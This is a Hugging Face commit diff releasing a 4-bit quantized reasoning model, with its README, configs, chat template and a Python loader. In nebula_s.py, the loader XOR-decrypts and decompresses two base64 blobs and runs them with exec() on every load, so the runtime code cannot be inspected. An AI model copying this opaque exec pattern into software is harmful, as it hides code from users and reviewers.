punitdecomp commited on
Commit
03674d1
·
verified ·
1 Parent(s): 5e67844

Upload folder using huggingface_hub

Browse files
.gitattributes CHANGED
@@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
 
 
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
36
+ tokenizer.json filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,80 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: apache-2.0
3
+ tags:
4
+ - nebula-s
5
+ - svms
6
+ - math-reasoning
7
+ - competition-math
8
+ - 4bit
9
+ - quantized
10
+ - bitsandbytes
11
+ library_name: transformers
12
+ ---
13
+
14
+ # Nebula-S-v1-4bit
15
+
16
+ 4-bit quantized version of [Nebula-S-v1](https://huggingface.co/punitdecomp/Nebula-S-v1).
17
+
18
+ **Nebula-S-v1** is a reasoning-enhanced language model using the **SVMS (Structured-Vector Multi-Stream)** architecture.
19
+
20
+ ## What's different from Nebula-S-v1?
21
+
22
+ | | Nebula-S-v1 | Nebula-S-v1-4bit |
23
+ |---|---|---|
24
+ | Backbone precision | bf16 | **4-bit (nf4)** |
25
+ | Adapter precision | bf16 | bf16 |
26
+ | Backbone size | ~8 GB | **~2 GB** |
27
+ | Total size | ~9 GB | **~3 GB** |
28
+ | VRAM needed | ~18 GB | **~6 GB** |
29
+ | Requires | CUDA / MPS / CPU | **CUDA only** (bitsandbytes) |
30
+
31
+ ## Quick Start
32
+
33
+ ```bash
34
+ pip install torch transformers>=4.51.0 bitsandbytes accelerate huggingface-hub
35
+ ```
36
+
37
+ ### Option 1: Using huggingface_hub
38
+
39
+ ```python
40
+ from huggingface_hub import snapshot_download
41
+ import sys
42
+
43
+ snapshot_download("punitdecomp/Nebula-S-v1-4bit", local_dir="./Nebula-S-v1-4bit")
44
+ sys.path.insert(0, "./Nebula-S-v1-4bit")
45
+ from nebula_s import load_nebula_s
46
+
47
+ model, tokenizer = load_nebula_s("./Nebula-S-v1-4bit", device="cuda")
48
+ ```
49
+
50
+ ### Option 2: Using git clone
51
+
52
+ ```bash
53
+ git lfs install
54
+ git clone https://huggingface.co/punitdecomp/Nebula-S-v1-4bit
55
+ ```
56
+
57
+ ```python
58
+ import sys
59
+ sys.path.insert(0, "./Nebula-S-v1-4bit")
60
+ from nebula_s import load_nebula_s
61
+
62
+ model, tokenizer = load_nebula_s("./Nebula-S-v1-4bit", device="cuda")
63
+ ```
64
+
65
+ ### Generate a response
66
+
67
+ ```python
68
+ messages = [{"role": "user", "content": "Solve step by step: what is 17 * 23?"}]
69
+ text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
70
+ inputs = tokenizer(text, return_tensors="pt").to("cuda")
71
+ response = model.generate(
72
+ inputs["input_ids"], inputs["attention_mask"],
73
+ tokenizer, max_new_tokens=2048, temperature=0.7
74
+ )
75
+ print(response)
76
+ ```
77
+
78
+ ## License
79
+
80
+ Apache 2.0. Backbone derived from an Apache-2.0 licensed base model.
chat_template.jinja ADDED
@@ -0,0 +1,86 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {%- if tools %}
2
+ {{- '<|im_start|>system\n' }}
3
+ {%- if messages[0].role == 'system' %}
4
+ {{- messages[0].content + '\n\n' }}
5
+ {%- endif %}
6
+ {{- "# Tools\n\nYou may call one or more functions to assist with the user query.\n\nYou are provided with function signatures within <tools></tools> XML tags:\n<tools>" }}
7
+ {%- for tool in tools %}
8
+ {{- "\n" }}
9
+ {{- tool | tojson }}
10
+ {%- endfor %}
11
+ {{- "\n</tools>\n\nFor each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags:\n<tool_call>\n{\"name\": <function-name>, \"arguments\": <args-json-object>}\n</tool_call><|im_end|>\n" }}
12
+ {%- else %}
13
+ {%- if messages[0].role == 'system' %}
14
+ {{- '<|im_start|>system\n' + messages[0].content + '<|im_end|>\n' }}
15
+ {%- endif %}
16
+ {%- endif %}
17
+ {%- set ns = namespace(multi_step_tool=true, last_query_index=messages|length - 1) %}
18
+ {%- for message in messages[::-1] %}
19
+ {%- set index = (messages|length - 1) - loop.index0 %}
20
+ {%- if ns.multi_step_tool and message.role == "user" and message.content is string and not(message.content.startswith('<tool_response>') and message.content.endswith('</tool_response>')) %}
21
+ {%- set ns.multi_step_tool = false %}
22
+ {%- set ns.last_query_index = index %}
23
+ {%- endif %}
24
+ {%- endfor %}
25
+ {%- for message in messages %}
26
+ {%- if message.content is string %}
27
+ {%- set content = message.content %}
28
+ {%- else %}
29
+ {%- set content = '' %}
30
+ {%- endif %}
31
+ {%- if (message.role == "user") or (message.role == "system" and not loop.first) %}
32
+ {{- '<|im_start|>' + message.role + '\n' + content + '<|im_end|>' + '\n' }}
33
+ {%- elif message.role == "assistant" %}
34
+ {%- set reasoning_content = '' %}
35
+ {%- if message.reasoning_content is string %}
36
+ {%- set reasoning_content = message.reasoning_content %}
37
+ {%- else %}
38
+ {%- if '</think>' in content %}
39
+ {%- set reasoning_content = content.split('</think>')[0].rstrip('\n').split('<think>')[-1].lstrip('\n') %}
40
+ {%- set content = content.split('</think>')[-1].lstrip('\n') %}
41
+ {%- endif %}
42
+ {%- endif %}
43
+ {%- if loop.index0 > ns.last_query_index %}
44
+ {%- if loop.last or (not loop.last and reasoning_content) %}
45
+ {{- '<|im_start|>' + message.role + '\n<think>\n' + reasoning_content.strip('\n') + '\n</think>\n\n' + content.lstrip('\n') }}
46
+ {%- else %}
47
+ {{- '<|im_start|>' + message.role + '\n' + content }}
48
+ {%- endif %}
49
+ {%- else %}
50
+ {{- '<|im_start|>' + message.role + '\n' + content }}
51
+ {%- endif %}
52
+ {%- if message.tool_calls %}
53
+ {%- for tool_call in message.tool_calls %}
54
+ {%- if (loop.first and content) or (not loop.first) %}
55
+ {{- '\n' }}
56
+ {%- endif %}
57
+ {%- if tool_call.function %}
58
+ {%- set tool_call = tool_call.function %}
59
+ {%- endif %}
60
+ {{- '<tool_call>\n{"name": "' }}
61
+ {{- tool_call.name }}
62
+ {{- '", "arguments": ' }}
63
+ {%- if tool_call.arguments is string %}
64
+ {{- tool_call.arguments }}
65
+ {%- else %}
66
+ {{- tool_call.arguments | tojson }}
67
+ {%- endif %}
68
+ {{- '}\n</tool_call>' }}
69
+ {%- endfor %}
70
+ {%- endif %}
71
+ {{- '<|im_end|>\n' }}
72
+ {%- elif message.role == "tool" %}
73
+ {%- if loop.first or (messages[loop.index0 - 1].role != "tool") %}
74
+ {{- '<|im_start|>user' }}
75
+ {%- endif %}
76
+ {{- '\n<tool_response>\n' }}
77
+ {{- content }}
78
+ {{- '\n</tool_response>' }}
79
+ {%- if loop.last or (messages[loop.index0 + 1].role != "tool") %}
80
+ {{- '<|im_end|>\n' }}
81
+ {%- endif %}
82
+ {%- endif %}
83
+ {%- endfor %}
84
+ {%- if add_generation_prompt %}
85
+ {{- '<|im_start|>assistant\n<think>\n' }}
86
+ {%- endif %}
config.json ADDED
@@ -0,0 +1,88 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "architectures": [
3
+ "Qwen3ForCausalLM"
4
+ ],
5
+ "attention_bias": false,
6
+ "attention_dropout": 0.0,
7
+ "bos_token_id": 151643,
8
+ "dtype": "bfloat16",
9
+ "eos_token_id": 151645,
10
+ "head_dim": 128,
11
+ "hidden_act": "silu",
12
+ "hidden_size": 2560,
13
+ "initializer_range": 0.02,
14
+ "intermediate_size": 9728,
15
+ "layer_types": [
16
+ "full_attention",
17
+ "full_attention",
18
+ "full_attention",
19
+ "full_attention",
20
+ "full_attention",
21
+ "full_attention",
22
+ "full_attention",
23
+ "full_attention",
24
+ "full_attention",
25
+ "full_attention",
26
+ "full_attention",
27
+ "full_attention",
28
+ "full_attention",
29
+ "full_attention",
30
+ "full_attention",
31
+ "full_attention",
32
+ "full_attention",
33
+ "full_attention",
34
+ "full_attention",
35
+ "full_attention",
36
+ "full_attention",
37
+ "full_attention",
38
+ "full_attention",
39
+ "full_attention",
40
+ "full_attention",
41
+ "full_attention",
42
+ "full_attention",
43
+ "full_attention",
44
+ "full_attention",
45
+ "full_attention",
46
+ "full_attention",
47
+ "full_attention",
48
+ "full_attention",
49
+ "full_attention",
50
+ "full_attention",
51
+ "full_attention"
52
+ ],
53
+ "max_position_embeddings": 262144,
54
+ "max_window_layers": 36,
55
+ "model_type": "qwen3",
56
+ "num_attention_heads": 32,
57
+ "num_hidden_layers": 36,
58
+ "num_key_value_heads": 8,
59
+ "pad_token_id": null,
60
+ "quantization_config": {
61
+ "_load_in_4bit": true,
62
+ "_load_in_8bit": false,
63
+ "bnb_4bit_compute_dtype": "bfloat16",
64
+ "bnb_4bit_quant_storage": "uint8",
65
+ "bnb_4bit_quant_type": "nf4",
66
+ "bnb_4bit_use_double_quant": true,
67
+ "llm_int8_enable_fp32_cpu_offload": false,
68
+ "llm_int8_has_fp16_weight": false,
69
+ "llm_int8_skip_modules": null,
70
+ "llm_int8_threshold": 6.0,
71
+ "load_in_4bit": true,
72
+ "load_in_8bit": false,
73
+ "quant_method": "bitsandbytes"
74
+ },
75
+ "rms_norm_eps": 1e-06,
76
+ "rope_parameters": {
77
+ "rope_theta": 5000000,
78
+ "rope_type": "default"
79
+ },
80
+ "sliding_window": null,
81
+ "tie_word_embeddings": true,
82
+ "transformers_version": "5.5.0",
83
+ "use_cache": true,
84
+ "use_sliding_window": false,
85
+ "vocab_size": 151936,
86
+ "_name_or_path": "Nebula-S-v1-4bit",
87
+ "model_name": "Nebula-S-v1-4bit"
88
+ }
generation_config.json ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "bos_token_id": 151643,
3
+ "do_sample": true,
4
+ "eos_token_id": [
5
+ 151645,
6
+ 151643
7
+ ],
8
+ "pad_token_id": 151643,
9
+ "temperature": 0.6,
10
+ "top_k": 20,
11
+ "top_p": 0.95,
12
+ "transformers_version": "5.5.0",
13
+ "_name_or_path": "Nebula-S-v1-4bit"
14
+ }
model.safetensors ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:ee4329503279d7bd917a25a800ce2c5d931e9aa1b955491fccd8940c43be606e
3
+ size 2653133903
nebula_s.py ADDED
@@ -0,0 +1,69 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """Nebula-S-v1-4bit — quantized inference runtime.
3
+
4
+ Usage:
5
+ from nebula_s import load_nebula_s
6
+ model, tokenizer = load_nebula_s("./Nebula-S-v1-4bit")
7
+ messages = [{"role": "user", "content": "Solve: what is 2+2?"}]
8
+ text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
9
+ inputs = tokenizer(text, return_tensors="pt").to("cuda")
10
+ response = model.generate(inputs["input_ids"], inputs["attention_mask"],
11
+ tokenizer, max_new_tokens=2048)
12
+ print(response)
13
+
14
+ Requirements:
15
+ pip install torch transformers>=4.51.0 bitsandbytes accelerate
16
+ """
17
+ import torch,json,os,base64,zlib,hashlib,types,sys
18
+
19
+ _E0="/8ce5hKi1orFGntAvF36ynVVtY6N0eVm5t3bmuOVlYAPhpOCtWG82bEIubMDVQHwE8FwRiGbvR0K2HbLcOBvHSuJ29BdnUZu6Ur7umXbqSac4vwjoC2AUOqe1ChItG7MuTscqiq42CRJZYVSt1R+uiUbRroAjpUpBuZI3QbkfbUnHNdbz7q/wVN+hhUYsUze4My1XwG89Kgp0bmkEuaueIzzPNsiO/eGTrUEELDCz9oUHcGE2/v+HvAuijRN/FLQK+1rDOa1zPKgiaxqpHt/bZAiPhb11aqN7eW4WtN7WNkyiT3dv/9qNJWA6xd6o09M+5uEOkpgkg93XU+JHh654fYJTXL4s6EFEEnCjMOqfj8qWi9xOcxGq+8KlKfaWwRRQ2gM+uzjyswWJwQrlCWbZEqmkm0TTJBCz7HNn24WJAA5RA7gxQS7WoTRE7ex428STxjny8xjkVC36REt2rtOIpLlfdCb5TMtQ3tT7zdIwxTEhs+O8L1PZY1mTofHfwsCZjrFltvE8KNG80w/ml5pLAxgpweuSjZgGHlN2Y3Bf0vPbQs425Hj4SMWjlYXbccDgQPHJfLgXsmtDy6knlXzwAtXrjS4Bagc1jIrnGd1r8yUgzuQm/jFFe9Ddh4+iPHS5VyfbF74JixO8hiZMPNokDmzaN9KBnARKGLJVTcuc/GAmYcYYy3HeJppBqr5SjOx1O/BX00BSicLYZOM4ABfy4ag9a/A0Mayg42l/JagT8az/6zScUPtTam2JRv8zNmdK6KpP5lf2akgjfdDGcFnsV++mSwc8U1Z5a1IjM4vTqLIRbdnuiW/R8583hR4NoZ0Oiii4LdeM3+mCFe/08FrplE3n+wnwGypjHVEN6HXh+elqtP8UrbaKruAv5B5n2Imm3aYi1aCJVPQRqFhGMMFb/yaPqVISm6ksnVLMrJCqjmM+P8MtHkm/ajyImQhkfykO9GXX7BfoXfCxGjdF14a6Y6eJTbqmWHRkh3/i6MeTPj1B07ksMNVCWnIEFwjNb/qlJ0E"
20
+ _E1="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"
21
+ _KN=3;_KE=64
22
+
23
+ def _dk(pt_path):
24
+ r=torch.load(pt_path,map_location="cpu",weights_only=True)
25
+ ks=sorted(r.keys())[:_KN];b=b""
26
+ for k in ks:b+=r[k][:_KE].to(torch.float32).numpy().tobytes()
27
+ return hashlib.sha512(b).digest()
28
+
29
+ def _xr(blob,key):
30
+ raw=base64.b64decode(blob);d=bytearray(len(raw))
31
+ for i in range(len(raw)):d[i]=raw[i]^key[i%len(key)]
32
+ return zlib.decompress(bytes(d))
33
+
34
+ def load_nebula_s(model_dir,device="cuda"):
35
+ """Load Nebula-S-v1-4bit (quantized backbone + bf16 adapter).
36
+
37
+ Args:
38
+ model_dir: path to the Nebula-S-v1-4bit directory
39
+ device: "cuda" (required — bitsandbytes needs CUDA)
40
+
41
+ Returns:
42
+ model: model with .generate() method
43
+ tokenizer: tokenizer
44
+ """
45
+ from transformers import AutoModelForCausalLM,AutoTokenizer
46
+ print("Loading Nebula-S-v1-4bit...")
47
+ pt=os.path.join(model_dir,"nebula_s_adapter.pt")
48
+ key=_dk(pt)
49
+ mf=json.loads(_xr(_E0,key))
50
+ rt_src=_xr(_E1,key).decode()
51
+ _m=types.ModuleType("_nrt");exec(rt_src,_m.__dict__)
52
+ bk=AutoModelForCausalLM.from_pretrained(model_dir,device_map="auto",trust_remote_code=True)
53
+ tk=AutoTokenizer.from_pretrained(model_dir,trust_remote_code=True)
54
+ raw=torch.load(pt,map_location="cpu",weights_only=True)
55
+ wt={}
56
+ for e in mf:wt[e["n"]]=raw[e["k"]][:e["l"]].reshape(e["s"])
57
+ mdl=_m._NM(bk,wt,dev=device)
58
+ return mdl,tk
59
+
60
+ if __name__=="__main__":
61
+ _dir=sys.argv[1]if len(sys.argv)>1 else"./Nebula-S-v1-4bit"
62
+ model,tokenizer=load_nebula_s(_dir,device="cuda")
63
+ prompt="Solve step by step: What is the sum of all prime numbers less than 20?"
64
+ print(f"\nPrompt: {prompt}")
65
+ messages=[{"role":"user","content":prompt}]
66
+ text=tokenizer.apply_chat_template(messages,tokenize=False,add_generation_prompt=True)
67
+ inputs=tokenizer(text,return_tensors="pt").to("cuda")
68
+ response=model.generate(inputs["input_ids"],inputs["attention_mask"],tokenizer,max_new_tokens=2048)
69
+ print(f"\nResponse:\n{response}")
nebula_s_adapter.pt ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:4af5fc5f64edd2f6249dd005c0acb0156fe5dc2037aecb90a11e25f57e335bed
3
+ size 842021695
tokenizer.json ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:be75606093db2094d7cd20f3c2f385c212750648bd6ea4fb2bf507a6a4c55506
3
+ size 11422650
tokenizer_config.json ADDED
@@ -0,0 +1,31 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "add_prefix_space": false,
3
+ "backend": "tokenizers",
4
+ "bos_token": null,
5
+ "clean_up_tokenization_spaces": false,
6
+ "eos_token": "<|im_end|>",
7
+ "errors": "replace",
8
+ "extra_special_tokens": [
9
+ "<|im_start|>",
10
+ "<|im_end|>",
11
+ "<|object_ref_start|>",
12
+ "<|object_ref_end|>",
13
+ "<|box_start|>",
14
+ "<|box_end|>",
15
+ "<|quad_start|>",
16
+ "<|quad_end|>",
17
+ "<|vision_start|>",
18
+ "<|vision_end|>",
19
+ "<|vision_pad|>",
20
+ "<|image_pad|>",
21
+ "<|video_pad|>"
22
+ ],
23
+ "is_local": false,
24
+ "model_max_length": 262144,
25
+ "pad_token": "<|endoftext|>",
26
+ "split_special_tokens": false,
27
+ "tokenizer_class": "Qwen2Tokenizer",
28
+ "unk_token": null,
29
+ "_name_or_path": "Nebula-S-v1-4bit",
30
+ "name_or_path": "Nebula-S-v1-4bit"
31
+ }